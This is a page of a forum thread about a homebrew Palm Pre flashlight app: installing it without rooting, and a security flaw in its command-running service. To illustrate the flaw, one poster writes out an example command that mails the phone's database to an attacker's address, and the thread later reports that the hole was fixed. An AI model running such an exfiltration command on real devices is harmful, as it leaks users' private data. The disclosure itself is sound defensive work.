Page 15 of 30 FirstFirst ... 5101112131415161718192025 ... LastLast
    Wow this is very nifty! Although I agree the screen backlight is still fairly blinding. Should go dark red or something when flashlight is on.
    This app is pretty BA! I had no clue what I was doing, I just followed the install directions exactley and it works perfect!!!
    Global Posts
    49 Global Posts
    Great stuff and thank you!
    Global Posts
    316 Global Posts
    can you make an ipk for this to work with webos quick install?
    Quote Originally Posted by kmax12 View Post
    can you make an ipk for this to work with webos quick install?

It will not work via an IPK. You need to have root access
    Quote Originally Posted by Mike_Diako View Post
    It will not work via an IPK. You need to have root access
    Incorrect. WebOSQuickInstall 2.0 supports postinst and prerm scripts in ipks. This means all apps that require rooting can be made into ipk files

WebOS-Internals have updated all their services, as well as Terminal to include postinst and prerm scipts, and now they're installable at the click of a button via WebOSQuiickInstall

I've PM'd Pregame regarding making the ipk files. Hopefully he responds soon.
    Quote Originally Posted by PreGame View Post
    One other thing I might add is that you can use the Prelease service to execute commands and run scripts for your own applications. Just use the runCmd method.

IE: palm://com.pregame.prelease/runCmd '{"cmd":"echo hello"}'
    Doesn't this open a huge security hole on the Pre?

A rogue webOS application masquerading as, say, a wallpaper switcher or ringtone app, could just call this runCmd method and do something like:

"/bin/mail PalmDatabase.db hacker@spam-bots-r-us.com"

This is the same type of massive security hole that the MyTether app had before version 1.5, which they fixed by creating a specific service that only did the things it had to do. The same really needs to be done here.

You can't have a flashlight application that allows your bank account details to be sent to some spam botnet.

(Note that there used to be an org.webosinternals.services package which also had the same security hole (it was actually based on much the same code as the Prelease service), and it has been withdrawn a number of weeks ago for exactly the same security vulnerability)

-- Rod
    WebOS Internals and Preware Founder and Developer
    You may wish to donate by Paypal to donations @ webos-internals.org if you find our work useful.
    All donations go back into development.
    www.webos-internals.org twitter.com/webosinternals facebook.com/webosinternals
    Quote Originally Posted by Jason Robitaille View Post
    Incorrect. WebOSQuickInstall 2.0 supports postinst and prerm scripts in ipks. This means all apps that require rooting can be made into ipk files

WebOS-Internals have updated all their services, as well as Terminal to include postinst and prerm scipts, and now they're installable at the click of a button via WebOSQuiickInstall

i hope you can get this to work soon . ive rooted for message forward and mytether but cant get the danm flashlight to work

i hope so....i really want this app without rooting and i finally got webosquickinstall to work!!!!
    what lines would we need to modify in order to have the dark background?
    Global Posts
    609 Global Posts
    How about having a larger on/off button in the center of the screen?
    I really like this app. This is the first thing I did when I started access my linux when it was first being developed. I am just wondering can we get a cooler icon, or maybe just make that one with a transparent background. I was challening an Iphone user the other day and he asked me well does your phone have a flashlight and proceeded to show me this white page, I just smiled and flipped on my flashlight and he politely went on back to work.
    PreGame, I hope you don't mind, but I've created ipk files of your Flashlight app and its Flashlight service. I also updated your service to get rid of the security issue. Feel free to update your Homebrew Gallery page with this new version. Until then, here are temporary download links:

Flashlight app
    Flashlight service

BOTH need to be installed for the app to work. They must be installed with WebOS Quick Install, and don't require rooting.
    Last edited by Jason Robitaille; 08/18/2009 at 07:02 PM.
    PreGame, I hope you don't mind, but I've created ipk files of your Flashlight app and its Flashlight service. I also updated your service to get rid of the security issue. Feel free to update your Homebrew Gallery page with this new version. Until then, here are temporary download links:

Flashlight app
    Flashlight service

BOTH need to be installed for the app to work. They must be installed with WebOS Quick Install, and don't require rooting.
    Jason, have you verified this works? I installed both and it does not seem to be working. I am going to try installing the service again separately but when I turn the switch to click on the flashlight nothing happens. I verified my flash does still work with the camera though.

EDIT: It still does not work after reinstalling the service.
    Last edited by bpdamas; 08/18/2009 at 11:28 AM. Reason: Verification
    Quote Originally Posted by bpdamas View Post
    Jason, have you verified this works? I installed both and it does not seem to be working. I am going to try installing the service again separately but when I turn the switch to click on the flashlight nothing happens. I verified my flash does still work with the camera though.

EDIT: It still does not work after reinstalling the service.
    k, I'm gonna double check some stuff and get back to you
    k, I'm gonna double check some stuff and get back to you
    i also tried this and it doesnt work
    Awesome app and one of the handiest ones as well - very nice to have "when you need it"
    Thank you so much!
    Quote Originally Posted by maxima2k53 View Post
    i also tried this and it doesnt work
    k, I've identified the issue. I've released v2.01 of WebOS Quick Install which fixes the bug.

http://forums.precentral.net/homebre...k-install.html

Should now work with those .ipk files above
    k, I've identified the issue. I've released v2.01 of WebOS Quick Install which fixes the bug.

http://forums.precentral.net/homebre...k-install.html

Should now work with those .ipk files above
    Will I need to delete then reinstall both files or can I just reinstall the service file?

EDIT: Nevermind. I just reinstalled the service file and it works now. Great job!
    Last edited by bpdamas; 08/18/2009 at 04:09 PM. Reason: Figured it out
    f'n sweet!! thanks!!